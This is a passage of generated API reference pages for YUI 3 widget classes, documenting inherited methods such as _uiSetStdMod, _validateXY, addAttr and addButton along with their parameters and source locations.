<p>Removes event listeners if widget is not visible, and attaches them otherwise.</p>
</div>
</div>
<div id="method__uiSetHostVisibleModal" class="method item inherited">
<h3 class="name"><code>_uiSetHostVisibleModal</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>Whether</code>
</li>
</ul><span class="paren">)</span>
</div>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetModality.html#method__uiSetHostVisibleModal">WidgetModality</a>:
<a href="../files/widget-modality_js_Widget-Modality.js.html#l303"><code>widget-modality/js/Widget-Modality.js:303</code></a>
</p>
</div>
<div class="description">
<p>Performs events attaching/detaching, stack shifting and mask repositioning based on the visibility of the widget</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">Whether</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="param-description">
<p>the widget is visible or not</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__uiSetHostZIndexModal" class="method item inherited">
<h3 class="name"><code>_uiSetHostZIndexModal</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>Z-Index</code>
</li>
</ul><span class="paren">)</span>
</div>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetModality.html#method__uiSetHostZIndexModal">WidgetModality</a>:
<a href="../files/widget-modality_js_Widget-Modality.js.html#l369"><code>widget-modality/js/Widget-Modality.js:369</code></a>
</p>
</div>
<div class="description">
<p>Sets the z-index of the mask node.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">Z-Index</code>
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="param-description">
<p>of the widget</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__uiSetShim" class="method item protected inherited">
<h3 class="name"><code>_uiSetShim</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>enable</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStack.html#method__uiSetShim">WidgetStack</a>:
<a href="../files/widget-stack_js_Widget-Stack.js.html#l272"><code>widget-stack/js/Widget-Stack.js:272</code></a>
</p>
</div>
<div class="description">
<p>Updates the UI to enable/disable the shim. If the widget is not currently visible,
creation of the shim is deferred until it is made visible, for performance reasons.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">enable</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="param-description">
<p>If true, creates/renders the shim, if false, removes it.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__uiSetStdMod" class="method item protected inherited">
<h3 class="name"><code>_uiSetStdMod</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>section</code>
</li>
<li class="arg">
<code>content</code>
</li>
<li class="arg">
<code>where</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method__uiSetStdMod">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l439"><code>widget-stdmod/js/Widget-StdMod.js:439</code></a>
</p>
</div>
<div class="description">
<p>Updates the rendered UI, adding the provided content (either an HTML string, or node reference),
to the specified section. The content is either added before, after or replaces existing content
in the section, based on the value of the <code>where</code> argument.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">section</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The section to be updated. Either WidgetStdMod.HEADER, WidgetStdMod.BODY or WidgetStdMod.FOOTER.</p>
</div>
</li>
<li class="param">
<code class="param-name">content</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a> | <a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="param-description">
<p>The new content (either as an HTML string, or Node reference) to add to the section</p>
</div>
</li>
<li class="param">
<code class="param-name">where</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>Optional. Either WidgetStdMod.AFTER, WidgetStdMod.BEFORE or WidgetStdMod.REPLACE.
If not provided, the content will replace existing content in the section.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__uiSetTabIndex" class="method item protected inherited">
<h3 class="name"><code>_uiSetTabIndex</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>Number</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__uiSetTabIndex">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l1049"><code>widget/js/Widget.js:1049</code></a>
</p>
</div>
<div class="description">
<p>Set the tabIndex on the widget's rendered UI</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">Number</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
</div>
<div id="method__uiSetVisible" class="method item protected inherited">
<h3 class="name"><code>_uiSetVisible</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>val</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__uiSetVisible">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l1005"><code>widget/js/Widget.js:1005</code></a>
</p>
</div>
<div class="description">
<p>Sets the visible state for the UI</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">val</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
</div>
<div id="method__uiSetVisibleButtons" class="method item protected inherited">
<h3 class="name"><code>_uiSetVisibleButtons</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>visible</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__uiSetVisibleButtons">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l1094"><code>widget-buttons/js/widget-buttons.js:1094</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Focuses this widget's <code>defaultButton</code> if there is one and this widget is
visible.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">visible</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="param-description">
<p>Whether this widget is visible.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__uiSetVisiblePosAlign" class="method item protected inherited">
<h3 class="name"><code>_uiSetVisiblePosAlign</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>visible</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionAlign.html#method__uiSetVisiblePosAlign">WidgetPositionAlign</a>:
<a href="../files/widget-position-align_js_Widget-PositionAlign.js.html#l441"><code>widget-position-align/js/Widget-PositionAlign.js:441</code></a>
</p>
</div>
<div class="description">
<p>Attaches or detaches alignment-syncing event handlers based on the widget's
<code>visible</code> Attribute state.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">visible</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="param-description">
<p>The current value of the widget's <code>visible</code>
Attribute.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__uiSetWidth" class="method item protected inherited">
<h3 class="name"><code>_uiSetWidth</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>val</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__uiSetWidth">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l984"><code>widget/js/Widget.js:984</code></a>
</p>
</div>
<div class="description">
<p>Sets the width on the widget's bounding box element</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">val</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a> | <a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
</div>
<div id="method__uiSetXY" class="method item protected inherited">
<h3 class="name"><code>_uiSetXY</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>val</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPosition.html#method__uiSetXY">WidgetPosition</a>:
<a href="../files/widget-position_js_Widget-Position.js.html#l258"><code>widget-position/js/Widget-Position.js:258</code></a>
</p>
</div>
<div class="description">
<p>Updates the UI to reflect the XY page co-ordinates passed in.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">val</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The XY page co-ordinates value to be reflected in the UI</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__uiSetZIndex" class="method item protected inherited">
<h3 class="name"><code>_uiSetZIndex</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>zIndex</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStack.html#method__uiSetZIndex">WidgetStack</a>:
<a href="../files/widget-stack_js_Widget-Stack.js.html#l261"><code>widget-stack/js/Widget-Stack.js:261</code></a>
</p>
</div>
<div class="description">
<p>Updates the UI to reflect the zIndex value passed in.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">zIndex</code>
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="param-description">
<p>The zindex to be reflected in the UI</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__uiSizeCB" class="method item protected inherited">
<h3 class="name"><code>_uiSizeCB</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>expand</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__uiSizeCB">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l699"><code>widget/js/Widget.js:699</code></a>
</p>
</div>
<div class="description">
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">expand</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
</div>
<div id="method__unbindDOM" class="method item protected inherited">
<h3 class="name"><code>_unbindDOM</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__unbindDOM">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l931"><code>widget/js/Widget.js:931</code></a>
</p>
</div>
<div class="description">
</div>
</div>
<div id="method__unbindUI" class="method item protected inherited">
<h3 class="name"><code>_unbindUI</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__unbindUI">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l892"><code>widget/js/Widget.js:892</code></a>
</p>
</div>
<div class="description">
</div>
</div>
<div id="method__unMapButton" class="method item protected inherited">
<h3 class="name"><code>_unMapButton</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>button</code>
</li>
<li class="arg">
<code>section</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__unMapButton">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l1112"><code>widget-buttons/js/widget-buttons.js:1112</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Removes the specified <code>button</code> from the buttons map (both name -> button and
section:name -> button), and nulls-out the <code>defaultButton</code> if it is
currently the default button.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">button</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="param-description">
<p>The button node to remove from the buttons map.</p>
</div>
</li>
<li class="param">
<code class="param-name">section</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The <code>WidgetStdMod</code> section (header/body/footer).</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__updateContentButtons" class="method item protected inherited">
<h3 class="name"><code>_updateContentButtons</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>section</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__updateContentButtons">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l1164"><code>widget-buttons/js/widget-buttons.js:1164</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Updates the content attribute which corresponds to the specified <code>section</code>.</p>
<p>The method updates the section's content to its current <code>childNodes</code>
(text and/or HTMLElement), or will null-out its contents if the section is
empty. It also specifies a <code>src</code> of <code>buttons</code> on the change event facade.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">section</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The <code>WidgetStdMod</code> section (header/body/footer) to
update.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__updateDefaultButton" class="method item protected inherited">
<h3 class="name"><code>_updateDefaultButton</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__updateDefaultButton">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l1148"><code>widget-buttons/js/widget-buttons.js:1148</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Updates the <code>defaultButton</code> attribute if it needs to be updated by comparing
its current value with the protected <code>_defaultButton</code> property.</p>
</div>
</div>
<div id="method__validateFillHeight" class="method item protected inherited">
<h3 class="name"><code>_validateFillHeight</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>val</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method__validateFillHeight">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l384"><code>widget-stdmod/js/Widget-StdMod.js:384</code></a>
</p>
</div>
<div class="description">
<p>Default validator for the fillHeight attribute. Verifies that the
value set is a valid section specifier - one of WidgetStdMod.HEADER, WidgetStdMod.BODY or WidgetStdMod.FOOTER,
or a falsey value if fillHeight is to be disabled.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">val</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The section which should be setup to fill height, or false/null to disable fillHeight</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
true if valid, false if not
</div>
</div>
</div>
<div id="method__validateXY" class="method item protected inherited">
<h3 class="name"><code>_validateXY</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>val</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPosition.html#method__validateXY">WidgetPosition</a>:
<a href="../files/widget-position_js_Widget-Position.js.html#l184"><code>widget-position/js/Widget-Position.js:184</code></a>
</p>
</div>
<div class="description">
<p>Default validator for the XY attribute</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">val</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Array" class="crosslink external" target="_blank">Array</a></span>
<div class="param-description">
<p>The XY page co-ordinate value which is being set.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>:
true if valid, false if not.
</div>
</div>
</div>
<div id="method__validTabIndex" class="method item protected inherited">
<h3 class="name"><code>_validTabIndex</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>tabIndex</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__validTabIndex">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l1159"><code>widget/js/Widget.js:1159</code></a>
</p>
</div>
<div class="description">
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">tabIndex</code>
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
</div>
<div id="method_addAttr" class="method item inherited">
<h3 class="name"><code>addAttr</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>name</code>
</li>
<li class="arg">
<code>config</code>
</li>
<li class="arg">
<code>lazy</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeCore.html#method_addAttr">AttributeCore</a>:
<a href="../files/attribute_js_AttributeCore.js.html#l124"><code>attribute/js/AttributeCore.js:124</code></a>
</p>
</div>
<div class="description">
<p>
Adds an attribute with the provided configuration to the host object.
</p>
<p>
The config argument object supports the following properties:
</p>
<dl>
<dt>value <Any></dt>
<dd>The initial value to set on the attribute</dd>
<dt>valueFn <Function | String></dt>
<dd>
<p>A function, which will return the initial value to set on the attribute. This is useful
for cases where the attribute configuration is defined statically, but needs to
reference the host instance ("this") to obtain an initial value. If both the value and valueFn properties are defined,
the value returned by the valueFn has precedence over the value property, unless it returns undefined, in which
case the value property is used.</p>
<p>valueFn can also be set to a string, representing the name of the instance method to be used to retrieve the value.</p>
</dd>
<dt>readOnly <boolean></dt>
<dd>Whether or not the attribute is read only. Attributes having readOnly set to true
cannot be modified by invoking the set method.</dd>
<dt>writeOnce <boolean> or <string></dt>
<dd>
Whether or not the attribute is "write once". Attributes having writeOnce set to true,
can only have their values set once, be it through the default configuration,
constructor configuration arguments, or by invoking set.
<p>The writeOnce attribute can also be set to the string "initOnly", in which case the attribute can only be set during initialization
(when used with Base, this means it can only be set during construction)</p>
</dd>
<dt>setter <Function | String></dt>
<dd>
<p>The setter function used to massage or normalize the value passed to the set method for the attribute.
The value returned by the setter will be the final stored value. Returning
<a href="#property_Attribute.INVALID_VALUE">Attribute.INVALID_VALUE</a>, from the setter will prevent
the value from being stored.
</p>
<p>setter can also be set to a string, representing the name of the instance method to be used as the setter function.</p>
</dd>
<dt>getter <Function | String></dt>
<dd>
<p>
The getter function used to massage or normalize the value returned by the get method for the attribute.
The value returned by the getter function is the value which will be returned to the user when they
invoke get.
</p>
<p>getter can also be set to a string, representing the name of the instance method to be used as the getter function.</p>
</dd>
<dt>validator <Function | String></dt>
<dd>
<p>
The validator function invoked prior to setting the stored value. Returning
false from the validator function will prevent the value from being stored.
</p>
<p>validator can also be set to a string, representing the name of the instance method to be used as the validator function.</p>
</dd>
<dt>lazyAdd <boolean></dt>
<dd>Whether or not to delay initialization of the attribute until the first call to get/set it.
This flag can be used to over-ride lazy initialization on a per attribute basis, when adding multiple attributes through
the <a href="#method_addAttrs">addAttrs</a> method.</dd>
</dl>
<p>The setter, getter and validator are invoked with the value and name passed in as the first and second arguments, and with
the context ("this") set to the host object.</p>
<p>Configuration properties outside of the list mentioned above are considered private properties used internally by attribute,
and are not intended for public use.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">name</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The name of the attribute.</p>
</div>
</li>
<li class="param">
<code class="param-name">config</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>An object with attribute configuration property/value pairs, specifying the configuration for the attribute.</p>
<p>
<strong>NOTE:</strong> The configuration object is modified when adding an attribute, so if you need
to protect the original values, you will need to merge the object.
</p>
</div>
</li>
<li class="param">
<code class="param-name">lazy</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="param-description">
<p>(optional) Whether or not to add this attribute lazily (on the first call to get/set).</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
A reference to the host object.
</div>
</div>
</div>
<div id="method_addAttrs" class="method item inherited">
<h3 class="name"><code>addAttrs</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>cfgs</code>
</li>
<li class="arg">
<code>values</code>
</li>
<li class="arg">
<code>lazy</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeCore.html#method_addAttrs">AttributeCore</a>:
<a href="../files/attribute_js_AttributeCore.js.html#l709"><code>attribute/js/AttributeCore.js:709</code></a>
</p>
</div>
<div class="description">
<p>Configures a group of attributes, and sets initial values.</p>
<p>
<strong>NOTE:</strong> This method does not isolate the configuration object by merging/cloning.
The caller is responsible for merging/cloning the configuration object if required.
</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">cfgs</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>An object with attribute name/configuration pairs.</p>
</div>
</li>
<li class="param">
<code class="param-name">values</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>An object with attribute name/value pairs, defining the initial values to apply.
Values defined in the cfgs argument will be over-written by values in this argument unless defined as read only.</p>
</div>
</li>
<li class="param">
<code class="param-name">lazy</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="param-description">
<p>Whether or not to delay the intialization of these attributes until the first call to get/set.
Individual attributes can over-ride this behavior by defining a lazyAdd configuration property in their configuration.
See <a href="#method_addAttr">addAttr</a>.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
A reference to the host object.
</div>
</div>
</div>
<div id="method_addButton" class="method item inherited">
<h3 class="name"><code>addButton</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>button</code>
</li>
<li class="arg">
<code class="optional">[section="footer"]</code>
</li>
<li class="arg">
<code class="optional">[index]</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method_addButton">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l284"><code>widget-buttons/js/widget-buttons.js:284</code></a>
</p>
<p>Available since 3.4.0</p>
</div>
<div class="description">
<p>Adds a button to this widget.</p>
<p>The new button node will have the <code>Y.Plugin.Button</code> plugin applied, be added
to this widget's <code>buttons</code>, and rendered in the specified <code>section</code> at the
specified <code>index</code> (or end of the section when no <code>index</code> is provided). If
the section does not exist, it will be created.</p>
<p>This fires the <code>buttonsChange</code> event and adds the following properties to
the event facade:</p>
<ul>
<li><p><code>button</code>: The button node or config object to add.</p></li>
<li><p><code>section</code>: The <code>WidgetStdMod</code> section (header/body/footer) where the
button will be added.</p></li>
<li><p><code>index</code>: The index at which the button will be in the section.</p></li>
<li><p><code>src</code>: "add"</p></li>
</ul>
<p><strong>Note:</strong> The <code>index</code> argument will be passed to the Array <code>splice()</code>
method, therefore a negative value will insert the <code>button</code> that many items
from the end. The <code>index</code> property on the <code>buttonsChange</code> event facade is
the index at which the <code>button</code> was added.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">button</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The button to add. This can be a <code>Y.Node</code>
instance, config Object, or String name for a predefined button on the
<code>BUTTONS</code> prototype property. When a config Object is provided, it will
be merged with any defaults provided by any <code>srcNode</code> and/or a button
with the same <code>name</code> defined on the <code>BUTTONS</code> property. The following
are the possible configuration properties beyond what Node plugins
accept by default:</p>
</div>
<ul class="params-list">
<li class="param">
<code class="param-name optional">[action]</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Function" class="crosslink external" target="_blank">Function</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>The default handler that should
be called when the button is clicked. A String name of a Function that
exists on the <code>context</code> object can also be provided. <strong>Note:</strong>
Specifying a set of <code>events</code> will override this setting.</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[classNames]</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String[]</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>Additional CSS classes to add
to the button node.</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[context=this]</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>Context which any <code>events</code> or
<code>action</code> should be called with. Defaults to <code>this</code>, the widget.
<strong>Note:</strong> <code>e.target</code> will access the button node in the event handlers.</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[disabled=false]</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>Whether the button should be
disabled.</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[events="click"]</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>Event name, or set of
